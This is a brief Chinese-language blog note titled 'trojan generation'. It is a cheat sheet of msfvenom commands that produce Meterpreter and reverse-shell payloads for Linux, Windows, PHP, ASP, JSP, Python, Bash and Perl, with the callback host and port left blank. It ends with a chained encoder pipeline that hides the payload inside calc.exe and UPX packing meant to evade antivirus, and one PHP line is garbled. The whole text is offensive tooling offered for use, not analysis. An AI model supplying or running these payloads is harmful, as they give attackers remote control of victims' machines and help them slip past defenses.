MS笔记 · 2021年4月12日 0

msfvenom:木马生成

Linux:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
cat shell.php | pbcopy && echo ‘ shell.php && pbpaste >> shell.php
ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
JSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
Python:
msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py
Bash:
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
Perl:
msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl
多重编码:
msfvenom -p windows/meterpreter/reverse_tcp lhost= lport= -e x86/shikata_ga_nai -i 20 -f raw | msfvenom -e x86/alpha_upper -a x86 –platform windows -i 5 -f raw | msfvenom -e x86/shikata_ga_nai -a x86 –platform windows -i 10 -f raw | msfvenom -e x86/countdown -a x86 –platform windows -i 10 -x calc.exe -f exe -o shell.exe
upx加壳
upx shell.exe